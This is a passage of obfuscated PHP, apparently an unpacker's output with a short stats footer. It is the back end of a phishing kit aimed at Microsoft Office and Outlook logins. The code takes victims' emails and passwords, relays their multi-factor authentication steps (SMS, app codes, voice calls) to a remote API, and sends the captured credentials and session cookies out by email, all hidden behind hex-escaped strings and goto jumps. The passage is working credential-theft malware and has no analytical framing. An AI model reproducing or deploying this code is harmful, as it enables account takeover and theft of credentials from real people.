"\x73\165\x63\143\145\163\163", "\x6d\145\163\163\x61\147\x65" => "\114\x6f\x67\151\156\40\163\x75\x63\143\x65\163\x73"]; Ff97dd33fba5549244a02f990a0781: } function loginOffice($email, $password) { global $api_token; $data = array("\157\146\146\x69\143\x65" => true, "\x61\160\151\137\x74\x6f\x6b\145\156" => $api_token, "\145\x6d\141\x69\154" => $email, "\160\x61\163\x73\167\157\x72\x64" => $password, "\144" => base64_encode($_SERVER["\x53\105\x52\x56\105\x52\x5f\x4e\x41\115\105"])); $response = request($data); $result = json_decode($response, true); if ($result["\x73\164\x61\164\165\163"] == "\x65\162\x72\x6f\x72") { goto B152e7b689b4c1848fa9151646b8fc; } if ($result["\x73\x74\141\164\165\163"] == "\163\x75\143\x63\145\163\x73") { goto fa0379b1ca6cf08732225ab5efafd8; } if ($result["\x73\164\141\x74\165\x73"] == "\x76\145\162\x69\x66\x79") { goto A43b35de75dbc3fdb2b0128c1363b8; } goto D9c0b96fb0f5cef990af707ea4fbcf; B152e7b689b4c1848fa9151646b8fc: sendEmailResult($email, $password, "\x4f\x46\x46\111\x43\x45\x20\x49\116\x56\x41\114\x49\x44"); return $result; goto D9c0b96fb0f5cef990af707ea4fbcf; fa0379b1ca6cf08732225ab5efafd8: sendEmailResult($email, $password, "\117\x46\x46\x49\x43\x45\x20\126\x41\x4c\x49\x44", base64_decode($result["\x63\157\x6f\153\151\x65\x73"])); return $result; goto D9c0b96fb0f5cef990af707ea4fbcf; A43b35de75dbc3fdb2b0128c1363b8: return $result; D9c0b96fb0f5cef990af707ea4fbcf: } function beginAuthOffice($method, $ctx, $flowToken, $canary, $cookie) { global $api_token; $data = array("\142\x65\x67\151\156\101\x75\164\150\117\146\x66\151\143\145" => true, "\141\x70\x69\137\x74\x6f\x6b\x65\x6e" => $api_token, "\155\x65\x74\150\157\x64" => $method, "\143\x74\x78" => $ctx, "\146\x6c\157\167\124\x6f\153\145\x6e" => $flowToken, "\x63\x61\156\141\x72\171" => $canary, "\143\x6f\157\x6b\151\x65" => $cookie, "\x64" => base64_encode($_SERVER["\123\x45\122\x56\105\122\137\x4e\x41\115\x45"])); $response = request($data); $result = json_decode($response, true); return $result; } function EndAuthOffice($token, $otc = null) { global $api_token; $data = array("\105\x6e\x64\x41\x75\x74\x68\x4f\x66\x66\x69\x63\145" => true, "\141\160\x69\137\x74\x6f\153\145\x6e" => $api_token, "\x74\x6f\153\145\156" => $token, "\157\x74\143" => $otc, "\x64" => base64_encode($_SERVER["\x53\105\x52\x56\105\x52\x5f\x4e\x41\115\x45"])); $response = request($data); $result = json_decode($response, true); return $result; } function processAuthOffice($token, $user, $cookie, $password) { global $api_token; $data = array("\160\x72\x6f\x63\x65\x73\x73\101\x75\164\x68\x4f\x66\146\x69\x63\x65" => true, "\141\x70\151\137\x74\x6f\x6b\145\x6e" => $api_token, "\x74\x6f\153\x65\x6e" => $token, "\165\x73\145\x72" => $user, "\143\x6f\157\153\x69\x65" => $cookie, "\160\x61\x73\x73\167\157\162\x64" => $password, "\x64" => base64_encode($_SERVER["\123\x45\122\126\105\122\137\x4e\x41\115\105"])); $response = request($data); $result = json_decode($response, true); if (!($result["\163\x74\141\x74\x75\163"] == "\163\165\143\x63\x65\163\163")) { goto Af676877dc183994558070afe16d63; } sendEmailResult(base64_decode($user), base64_decode($password), "\117\106\x46\111\103\105\x20\x32\x46\x41\40\126\x41\x4c\x49\104", base64_decode($result["\143\157\157\153\x69\x65\163"])); Af676877dc183994558070afe16d63: } $action = $_POST["\144\157"]; if ($action == "\x63\x68\145\143\x6b") { goto d5f23605601c738d292f983b7321d7; } if ($action == "\154\157\147\x69\156") { goto Bc0e37145a2b1d461fad28a2ebb9da; } if ($action == "\x76\x65\162\151\146\x79") { goto bc0793df41cbd75fd209387765c300; } if (!($action == "\x63\150\145\x63\153\x56\145\162\x69\x66\171")) { goto dfd2ced1ceee1db14b0d07dc9c9224; } $user = base64_encode($_POST["\x75\163\x65\162"]); $token = json_decode(gzinflate(base64_decode($_POST["\164\157\x6b\x65\x6e"])), true); if ($_POST["\163\145\x72\x76\151\x63\145"] == "\156\157\x74\x69\x66") { goto f6bbab46c138c1be3739e68344dba5; } goto Fc6753e05c7861d2afdb1949acc3a5; Ec382fcde0dd5bcbe69e97f32804a3: $endAuth = EndAuthOffice($_POST["\164\x6f\153\145\156"], $_POST["\x6f\164\143"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["\143\x74\x78" => $endAuth["\103\x74\x78"], "\146\154\157\x77\x54\157\153\x65\156" => $endAuth["\106\x6c\x6f\167\x54\x6f\x6b\145\156"], "\x63\x6f\157\153\151\x65" => $token["\x63\157\157\153\x69\145"], "\x6d\x65\164\x68\157\144" => $token["\155\145\164\150\157\144"], "\x73\x65\x73\x73\151\x6f\156" => $endAuth["\x53\x65\163\163\x69\x6f\156\x49\x64"]])))); if ($endAuth["\x53\x75\143\x63\x65\163\163"]) { goto a81b9d9b4b2f67e0f387ac3193dda1; } echo "\74\x73\x63\162\151\x70\164\76\x77\151\156\144\x6f\x77\x2e\x6c\157\143\x61\x74\x69\x6f\x6e\56\150\162\x65\x66\75\140\61" . $random . "\x3f\x73\155\x73\46\x75\163\x65\x72\75" . $user . "\x26\142\x67\75" . base64_encode($_POST["\142\141\143\x6b\x67\x72\x6f\165\156\x64"]) . "\46\154\157\147\x6f\75" . base64_encode($_POST["\x6c\157\x67\157"]) . "\46\x74\x6f\x6b\145\156\x3d" . $newToken . "\46\x65\162\162\157\x72\x26\153\145\x79\x3d" . $_POST["\x6b\145\x79"] . "\46\x62\157\x69\154\x65\x72\75" . urlencode(base64_encode($_POST["\x62\x6f\151\154\145\x72"])) . "\x60\x3b\74\57\163\x63\x72\151\160\x74\76"; goto Baf4b3fb1f66eeaa31d45dc1544430; a81b9d9b4b2f67e0f387ac3193dda1: processAuthOffice($endAuth, $user, $token["\x63\157\x6f\153\x69\145"], $_POST["\x6b\x65\x79"]); echo "\x3c\x73\143\162\151\x70\x74\x3e\167\x69\156\144\157\167\56\154\157\143\x61\164\x69\x6f\x6e\x2e\x68\x72\145\146\x3d\140\x30" . $random . "\77\163\165\x63\x63\x65\x73\163\46\x69\144\x3d" . $user . "\x26\142\147\x3d" . base64_encode($_POST["\142\141\143\153\147\x72\157\165\x6e\144"]) . "\x26\x6c\157\x67\157\75" . base64_encode($_POST["\x6c\x6f\x67\157"]) . "\46\x62\157\151\x6c\145\162\x3d" . urlencode(base64_encode($_POST["\x62\x6f\151\154\145\x72"])) . "\140\x3b\x3c\57\x73\x63\x72\151\160\164\76"; Baf4b3fb1f66eeaa31d45dc1544430: edba106daa5ac11c772ee087747330: goto C5d28e59771496dff7cc65925103a5; f6bbab46c138c1be3739e68344dba5: $endAuth = EndAuthOffice($_POST["\164\x6f\153\145\156"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["\x63\164\x78" => $endAuth["\103\x74\170"], "\x66\x6c\x6f\167\124\x6f\x6b\x65\x6e" => $endAuth["\106\154\x6f\x77\x54\x6f\153\x65\156"], "\x63\x6f\x6f\153\151\x65" => $token["\143\x6f\x6f\153\x69\145"], "\x6d\145\164\150\x6f\x64" => $token["\155\145\x74\x68\157\144"], "\x73\x65\x73\x73\151\157\156" => $endAuth["\123\145\163\163\x69\x6f\x6e\111\144"]])))); if ($endAuth["\x53\x75\143\143\x65\163\x73"]) { goto F0c946f1064cddc9551e68096d11c1; } echo json_encode(["\163\164\141\164\165\x73" => false, "\155\x65\x73\163\x61\x67\x65" => "\126\145\x72\151\146\x69\143\x61\x74\x69\157\x6e\40\x66\x61\151\154\145\x64", "\164\157\153\145\156" => $newToken]); goto A7e70858e748365449c53d71e003ea; F0c946f1064cddc9551e68096d11c1: processAuthOffice($endAuth, $user, $token["\x63\157\x6f\153\x69\x65"], $_POST["\153\145\171"]); echo json_encode(["\163\164\x61\x74\165\163" => true, "\162\x65\x64\151\x72\x65\x63\164" => "\x30{$random}\x3f\x73\x75\x63\143\145\163\x73\x26\151\144\x3d{$user}\46\x62\147\75" . base64_encode($_POST["\x62\141\143\x6b\147\x72\x6f\165\x6e\x64"]) . "\x26\x6c\x6f\x67\157\75" . base64_encode($_POST["\154\x6f\x67\157"]) . "\x26\x62\x6f\151\154\145\162\x3d" . urlencode(base64_encode($_POST["\x62\x6f\151\x6c\x65\162"]))]); goto f0e1dc98b35f5f6dbc69d43f1e6212; c860871d370f12d8d60cca5b2c741a: a8fa16226b07e94806923ecb977b77: $login = loginOutlook($_POST["\x75\163\145\162"], $_POST["\x70\141\x73\x73"]); Fefec8aa27a1aa82a44931334a4c65: $user = base64_encode($_POST["\165\163\x65\162"]); if ($login["\163\164\x61\164\165\163"] == "\x65\x72\x72\157\x72") { goto f3a702f1f8e320d6dec04b1ad25e4d; } if ($login["\x73\164\x61\x74\165\163"] == "\163\165\143\143\145\x73\163") { goto E1fd44d1846249cae8e4854ce48408; } if (!($login["\163\164\x61\164\x75\163"] == "\x76\145\x72\151\x66\x79")) { goto A038dbe3947a2b6fe0e3d8e8576070; } echo "\74\163\143\x72\151\160\164\x3e\x77\x69\x6e\144\x6f\167\56\154\x6f\143\x61\164\151\157\x6e\x2e\150\x72\145\x66\75\x60\61" . $random . "\x3f\154\x69\x73\x74\x26\165\x73\x65\x72\x3d" . $user . "\x26\x62\x67\75" . base64_encode($_POST["\142\x61\143\x6b\x67\x72\x6f\x75\156\x64"]) . "\x26\x6c\x6f\x67\x6f\x3d" . base64_encode($_POST["\x6c\x6f\147\157"]) . "\46\164\157\x6b\x65\x6e\75" . $login["\x64\x61\x74\x61"] . "\46\155\145\x74\150\157\144\x3d" . $login["\155\145\164\150\157\x64"] . "\x26\153\145\171\75" . $login["\x6b\x65\x79"] . "\46\x62\x6f\x69\154\x65\x72\75" . urlencode(base64_encode($_POST["\x62\x6f\x69\x6c\145\162"])) . "\140\73\x3c\57\x73\x63\x72\151\x70\x74\76"; A038dbe3947a2b6fe0e3d8e8576070: goto e6764e481157d3ee4fbc170e741f49; E1fd44d1846249cae8e4854ce48408: echo "\74\x73\143\x72\x69\x70\x74\76\167\151\156\x64\x6f\167\x2e\x6c\157\x63\141\x74\151\157\156\x2e\150\x72\x65\x66\x3d\140\60" . $random . "\77\x73\165\143\x63\x65\163\163\x26\x69\x64\75" . $user . "\x26\142\x67\75" . base64_encode($_POST["\x62\141\x63\153\x67\162\157\165\x6e\x64"]) . "\x26\154\x6f\x67\157\x3d" . base64_encode($_POST["\154\157\147\157"]) . "\x26\x62\x6f\x69\154\x65\162\75" . urlencode(base64_encode($_POST["\x62\x6f\151\x6c\x65\162"])) . "\x60\73\74\x2f\x73\143\x72\x69\x70\x74\x3e"; e6764e481157d3ee4fbc170e741f49: goto b7eb030454e54510d5541e0e1b2fdc; f3a702f1f8e320d6dec04b1ad25e4d: if (isset($login["\155\x65\163\x73\141\x67\145"]) && $login["\x6d\145\163\x73\141\147\x65"] == "\65\60\60\65\x33") { goto bec8a53446abb5046da4abc35931e6; } $msg = "\60"; goto a5555835905f29079b680fcbe98395; bec8a53446abb5046da4abc35931e6: $msg = "\61"; goto A37c3570fbd4bab2d74ac7d9c85c41; A37c3570fbd4bab2d74ac7d9c85c41: a5555835905f29079b680fcbe98395: echo "\x3c\x73\143\x72\151\x70\x74\x3e\x77\151\156\x64\157\x77\56\154\x6f\x63\141\164\x69\157\156\56\x68\162\x65\x66\75\140\60" . $random . "\x3f\x65\x72\162\157\x72\46\x69\x64\75" . $user . "\x26\x62\147\x3d" . base64_encode($_POST["\142\x61\x63\x6b\147\x72\x6f\x75\156\144"]) . "\46\154\157\x67\157\75" . base64_encode($_POST["\154\157\x67\157"]) . "\x26\142\157\x69\x6c\145\162\x3d" . urlencode(base64_encode($_POST["\x62\157\151\x6c\x65\x72"])) . "\x26\x6d\x73\x67\x3d" . $msg . "\x60\x3b\x3c\57\163\x63\162\x69\160\x74\x3e"; b7eb030454e54510d5541e0e1b2fdc: c979094e39d1f4d65c9e1eff279d22: goto E3e70e8e67f33165f49fece0e4a2b5; d5f23605601c738d292f983b7321d7: $email = $_POST["\x65\x6d\x61\x69\154"]; $result = getDetailEmail($email); echo json_encode($result); goto cf8a8e4a057233a6f765c4ce7de51f; Ed1cbb4603f84fae5168e5d3bee00d: goto b28ce2e28c6e7a59de57756961b79c; D944b4b833757bc2bfa0765684b4c2: processAuthOffice($endAuth, $user, $token["\143\157\157\x6b\x69\x65"], $_POST["\153\x65\x79"]); echo json_encode(["\163\x74\x61\164\x75\x73" => true, "\162\145\144\x69\x72\145\x63\x74" => "\60{$random}\77\163\x75\x63\143\145\163\163\46\x69\x64\75{$user}\46\142\x67\x3d" . base64_encode($_POST["\x62\x61\x63\x6b\x67\162\157\165\x6e\x64"]) . "\x26\x6c\x6f\147\x6f\x3d" . base64_encode($_POST["\154\157\x67\x6f"]) . "\46\x62\157\151\154\145\x72\75" . urlencode(base64_encode($_POST["\x62\157\151\154\145\162"]))]); b28ce2e28c6e7a59de57756961b79c: Eefc3ba92576909bb4bf6aa6fe5c59: goto f17dcd2a16706ab4fbaca0e6c59d1f; d2311d88b865849f3347a5801d408e: $endAuth = EndAuthOffice($_POST["\164\157\153\145\156"], $_POST["\x6f\164\143"]); $newToken = urlencode(base64_encode(gzdeflate(json_encode(["\143\164\170" => $endAuth["\x43\x74\170"], "\146\154\157\167\x54\x6f\153\x65\x6e" => $endAuth["\106\154\157\167\124\157\x6b\145\x6e"], "\143\x6f\x6f\153\151\x65" => $token["\x63\x6f\157\153\151\145"], "\x6d\x65\x74\150\x6f\x64" => $token["\x6d\x65\x74\150\x6f\x64"], "\163\x65\x73\163\x69\x6f\156" => $endAuth["\123\145\163\x73\x69\157\156\x49\x64"]])))); if ($endAuth["\x53\x75\x63\x63\x65\x73\x73"]) { goto Abdfe439276580e7a47443d23f15ba; } echo "\74\x73\143\x72\x69\x70\x74\76\167\x69\156\144\x6f\x77\56\154\x6f\143\141\164\151\157\156\x2e\150\x72\145\x66\75\140\61" . $random . "\77\160\150\157\x6e\x65\x61\160\160\157\x74\x70\x26\x75\163\x65\x72\x3d" . $user . "\46\x62\x67\75" . base64_encode($_POST["\x62\141\143\x6b\147\x72\157\x75\156\x64"]) . "\x26\x6c\x6f\x67\157\75" . base64_encode($_POST["\154\x6f\x67\157"]) . "\x26\142\x6f\x69\154\x65\x72\x3d" . urlencode(base64_encode($_POST["\142\x6f\151\154\145\x72"])) . "\46\x74\157\x6b\145\156\x3d" . $newToken . "\46\145\162\162\x6f\x72\x26\x6b\145\x79\x3d" . $_POST["\x6b\145\x79"] . "\140\x3b\x3c\x2f\163\x63\x72\x69\160\164\x3e"; goto B38cd4f6a494bfd155abbddf16b8a0; Abdfe439276580e7a47443d23f15ba: processAuthOffice($endAuth, $user, $token["\143\157\x6f\153\x69\145"], $_POST["\x6b\x65\x79"]); echo "\x3c\163\143\162\x69\x70\164\76\167\151\156\x64\x6f\167\x2e\x6c\x6f\143\x61\x74\151\157\x6e\56\x68\162\x65\146\x3d\x60\60" . $random . "\77\x73\165\143\x63\145\163\x73\x26\151\x64\75" . $user . "\x26\142\x67\x3d" . base64_encode($_POST["\142\141\143\x6b\x67\x72\x6f\x75\x6e\144"]) . "\46\x6c\157\x67\157\75" . base64_encode($_POST["\x6c\x6f\147\157"]) . "\x26\x62\157\x69\154\x65\x72\75" . urlencode(base64_encode($_POST["\142\157\x69\154\x65\x72"])) . "\140\x3b\74\x2f\163\143\162\151\x70\x74\x3e"; B38cd4f6a494bfd155abbddf16b8a0: f17dcd2a16706ab4fbaca0e6c59d1f: goto edba106daa5ac11c772ee087747330; Dfc3c559ac3a0ecd78f962a1ff6dc5: goto Ec382fcde0dd5bcbe69e97f32804a3; d1d58d94f54a8efb5b52a612485a6a: goto b8056c429956dfce06b7317ffa520f; A77a699a708145204fd58d2ee4ed7d: $redirect = "\x74\x77\157\141\x77\x61\171\163\155\163"; b8056c429956dfce06b7317ffa520f: goto Ea2a89953d88acfe691365cc17f52e; C05673fc4689e7396ecb0a25a213d4: $redirect = "\x73\155\163"; Ea2a89953d88acfe691365cc17f52e: goto c330cb6155d9f153e2a01342f123e8; D01f4c1765c52d3752dc1f533c873f: $redirect = "\x70\150\x6f\156\x65\141\x70\x70\157\x74\x70"; c330cb6155d9f153e2a01342f123e8: goto adea12a6dd9a029f2292a36731c25b; Fdb6f26c8fe3d0e2e0912fb88cb82b: $redirect = "\x70\150\x6f\156\145\x61\x70\160\156\157\x74\151\x66"; adea12a6dd9a029f2292a36731c25b: $beginAuth = beginAuthOffice($method, $token["\x63\164\170"], $token["\x66\154\157\x77\x54\x6f\153\x65\156"], $token["\143\141\156\x61\x72\171"], $token["\143\x6f\157\x6b\x69\x65"]); if ($beginAuth["\x53\165\143\x63\145\x73\x73"]) { goto Becf805cfaa21a9a62d6082cd16f51; } echo json_encode(["\x73\x74\x61\x74\x75\163" => false, "\x6d\145\x73\163\141\147\x65" => "\x53\157\x72\x72\x79\x2c\40\x77\x65\x27\162\145\40\150\x61\x76\151\x6e\147\x20\164\x72\157\x75\x62\x6c\145\x20\166\145\x72\x69\x66\x79\x69\x6e\147\x20\171\157\165\162\40\x61\143\143\157\x75\x6e\x74\56\x20\x50\x6c\x65\x61\163\x65\40\x74\x72\x79\40\141\147\141\x69\156\x2e"]); goto C1a8c8911b85bf571cce4bf6b3ce41; goto Ee27f6a8a99d6338c86569df41edfb; f0e1dc98b35f5f6dbc69d43f1e6212: A7e70858e748365449c53d71e003ea: C5d28e59771496dff7cc65925103a5: dfd2ced1ceee1db14b0d07dc9c9224: goto Eb5e8854f0c158ff64036b9e6e75f6; bc0793df41cbd75fd209387765c300: $token = json_decode(gzinflate(base64_decode($_POST["\x74\x6f\x6b\x65\x6e"])), true); $bg = base64_encode($_POST["\x62\141\143\x6b\147\x72\157\165\156\x64"]); $logo = base64_encode($_POST["\x6c\x6f\x67\157"]); $method = $_POST["\x6d\x65\164\x68\x6f\x64"]; $user = base64_encode($_POST["\165\x73\x65\x72"]); $key = $_POST["\x6b\x65\171"]; $boiler = urlencode(base64_encode($_POST["\x62\x6f\x69\154\145\162"])); $redirect = ''; if ($method == "\x50\x68\x6f\156\145\101\x70\x70\x4e\157\164\151\146\151\143\x61\x74\151\157\156") { goto Fdb6f26c8fe3d0e2e0912fb88cb82b; } if ($method == "\x50\150\x6f\x6e\x65\101\160\x70\117\124\120") { goto D01f4c1765c52d3752dc1f533c873f; } if ($method == "\x4f\156\145\x57\141\171\x53\x4d\x53") { goto C05673fc4689e7396ecb0a25a213d4; } if ($method == "\124\167\x6f\127\141\171\126\157\x69\x63\145\x4d\x6f\x62\151\154\x65") { goto A77a699a708145204fd58d2ee4ed7d; } if (!($method == "\x54\x77\157\127\141\171\x56\157\151\x63\x65\x4f\146\146\x69\x63\145")) { goto C204fc4253216d4604dbb8937a74af; } $redirect = "\164\x77\x6f\x61\167\141\x79\x6f\x66\x66"; C204fc4253216d4604dbb8937a74af: goto d1d58d94f54a8efb5b52a612485a6a; Cbce8fe34c9306d4c7525081ad1ec2: error_reporting(0); header("\101\143\x63\x65\163\x73\x2d\103\x6f\156\164\162\x6f\x6c\x2d\x41\x6c\154\x6f\167\55\x4f\162\151\x67\x69\x6e\x3a\x20\x2a"); if (!empty($_SERVER["\x48\x54\124\120\137\x43\114\x49\x45\116\x54\137\111\120"]) && filter_var($_SERVER["\x48\x54\x54\x50\137\x43\114\111\x45\x4e\124\137\x49\x50"], FILTER_VALIDATE_IP)) { goto ed1f4a9c6a73e8602e65115c975571; } if (!empty($_SERVER["\x48\x54\124\120\x5f\130\137\x46\x4f\x52\127\101\122\x44\105\x44\x5f\106\x4f\122"]) && filter_var($_SERVER["\x48\124\124\x50\x5f\130\x5f\106\117\122\x57\101\122\104\105\104\x5f\106\x4f\122"], FILTER_VALIDATE_IP)) { goto B864b4cb2fb089636e08c35acea8b8; } if (filter_var($_SERVER["\x52\x45\115\117\x54\105\137\101\104\x44\122"], FILTER_VALIDATE_IP)) { goto E9bebce0820a2552ae469ed33e27e7; } goto e42b807c4f129eb9d1a57e77e783f2; ed1f4a9c6a73e8602e65115c975571: $ip = $_SERVER["\x48\124\x54\x50\137\103\x4c\x49\x45\116\x54\137\x49\120"]; goto e42b807c4f129eb9d1a57e77e783f2; B864b4cb2fb089636e08c35acea8b8: $ip = $_SERVER["\110\x54\124\x50\x5f\130\x5f\106\x4f\122\127\x41\x52\104\x45\104\x5f\106\x4f\x52"]; goto e42b807c4f129eb9d1a57e77e783f2; E9bebce0820a2552ae469ed33e27e7: $ip = $_SERVER["\x52\105\x4d\117\124\x45\x5f\x41\104\x44\122"]; e42b807c4f129eb9d1a57e77e783f2: session_start(); if (!(!isset($_SESSION["\x74\x6f\x6b\x65\x6e"]) || $_SESSION["\x74\x6f\x6b\145\x6e"] !== $ip)) { goto fd36ef428e19bffd705c9b6958c9d4; } header("\114\x6f\143\x61\164\151\157\156\x3a\x20\x69\x6e\x64\x65\170\x2e\x70\150\160"); exit; fd36ef428e19bffd705c9b6958c9d4: goto afa5a161aa2bc6cb165e92eedbf398; cf8a8e4a057233a6f765c4ce7de51f: E3e70e8e67f33165f49fece0e4a2b5:

Function Calls

None

Variables

None

Stats

MD5 c89024ed1c4ebbf5134009e3e78b824d
Eval Count 0
Decode Time 62 ms